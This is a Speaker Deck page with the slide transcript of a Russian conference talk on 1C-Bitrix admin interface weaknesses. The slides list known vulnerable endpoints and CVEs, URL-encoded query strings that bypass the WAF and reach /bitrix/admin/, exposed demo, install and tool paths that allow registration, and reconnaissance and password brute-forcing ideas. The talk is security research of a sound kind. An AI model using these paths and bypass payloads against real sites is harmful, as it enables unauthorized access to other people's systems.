Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Выйди и зайди нормально

Avatar for Bo0oM Bo0oM
September 13, 2023
Programming
0
67

Выйди и зайди нормально

О некоторых особенностях административного интерфейса CMS 1С-Битрикс
Avatar for Bo0oM

Bo0oM

September 13, 2023
Tweet

More Decks by Bo0oM

See All by Bo0oM
Носок на сок
Avatar for Bo0oM bo0om
0
1.7k
Защита от вредоносной автоматизации сегодня
Avatar for Bo0oM bo0om
0
570
Defending against automatization using nginx
Avatar for Bo0oM bo0om
0
820
Antibot pitch deck
Avatar for Bo0oM bo0om
0
140
31337
Avatar for Bo0oM bo0om
0
170
Your back is white
Avatar for Bo0oM bo0om
0
350
FTP2RCE
Avatar for Bo0oM bo0om
1
7.4k
Interpret it!
Avatar for Bo0oM bo0om
0
1.1k
At Home Among Strangers
Avatar for Bo0oM bo0om
1
3.9k

Other Decks in Programming

See All in Programming
iOS 26にアップデートすると実機でのHot Reloadができない?
Avatar for Aoi Umigishi umigishiaoi
0
130
NPOでのDevinの活用
Avatar for みんなのコード codeforeveryone
0
840
システム成長を止めない!本番無停止テーブル移行の全貌
Avatar for さかうぇ sakawe_ee
1
200
効率的な開発手段として VRTを活用する
Avatar for Yosuke Ishikawa ishkawa
0
140
おやつのお供はお決まりですか?@WWDC25 Recap -Japan-\(region).swift
Avatar for gangan shingangan
0
140
git worktree × Claude Code × MCP ~生成AI時代の並列開発フロー~
Avatar for hisuzuya hisuzuya
1
570
코딩 에이전트 체크리스트: Claude Code ver.
Avatar for nacyot nacyot
0
200
Is Xcode slowly dying out in 2025?
Avatar for 上ちょ / uetyo uetyo
1
280
Webの外へ飛び出せ NativePHPが切り拓くPHPの未来
Avatar for Takuya Katsusa takuyakatsusa
2
560
AI時代のソフトウェア開発を考える(2025/07版) / Agentic Software Engineering Findy 2025-07 Edition
Avatar for Takuto Wada twada
PRO
89
30k
AIと”コードの評価関数”を共有する / Share the "code evaluation function" with AI
Avatar for Shintani Teppei euglena1215
1
170
Deep Dive into ~/.claude/projects
Avatar for Yuya Hirayama hiragram
14
2.6k

Featured

See All Featured
Building a Modern Day 
E-commerce SEO Strategy
Avatar for Aleyda Solis aleyda
42
7.4k
JavaScript: Past, Present, and Future - NDC Porto 2020
Avatar for David Neal reverentgeek
50
5.5k
Fight the Zombie Pattern Library - RWD Summit 2016
Avatar for Marcelo Somers marcelosomers
233
17k
Scaling GitHub
Avatar for Zach Holman holman
460
140k
Mobile First: as difficult as doing things right
Avatar for Swwweet swwweet
223
9.7k
The Language of Interfaces
Avatar for Des Traynor destraynor
158
25k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
Avatar for mongodb mongodb
46
9.6k
Unsuck your backbone
Avatar for Amy Palamountain ammeep
671
58k
Intergalactic Javascript Robots from Outer Space
Avatar for Vicent Martí tanoku
271
27k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
Avatar for Addy Osmani addyosmani
7
740
Build The Right Thing And Hit Your Dates
Avatar for Maggie C. maggiecrowley
36
2.8k
Automating Front-end Workflow
Avatar for Addy Osmani addyosmani
1370
200k

Transcript

  1. «Выйди и зайди нормально!» Anton Lopanitsyn

  2. КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки

    (защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM

  3. Как обычно ломают Bitrix? • restore.php Система восстановления файлов в

    Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев

  4. Исправления

  5. Исправления

  6. None

  7. Обходим первые защиты

  8. SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/

  9. SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/

  10. None
  11. None
  12. None

  13. /auth/?register=yes

  14. /crm/?register=yes

  15. /auth/oauth2/?register=yes

  16. Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=

  17. Demo

  18. Demo

  19. Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php

  20. Install

  21. None

  22. Даже если взять и попасть в админку не удалось •

    Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию

  23. Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php

  24. Tools

  25. Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1

  26. Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php

  27. Tools /bitrix/tools/bizproc_get_html_editor.php

  28. /bitrix/modules/subscribe/public/subscr_edit.php

  29. smtp

  30. None
  31. None

  32. Никто не знает, что тут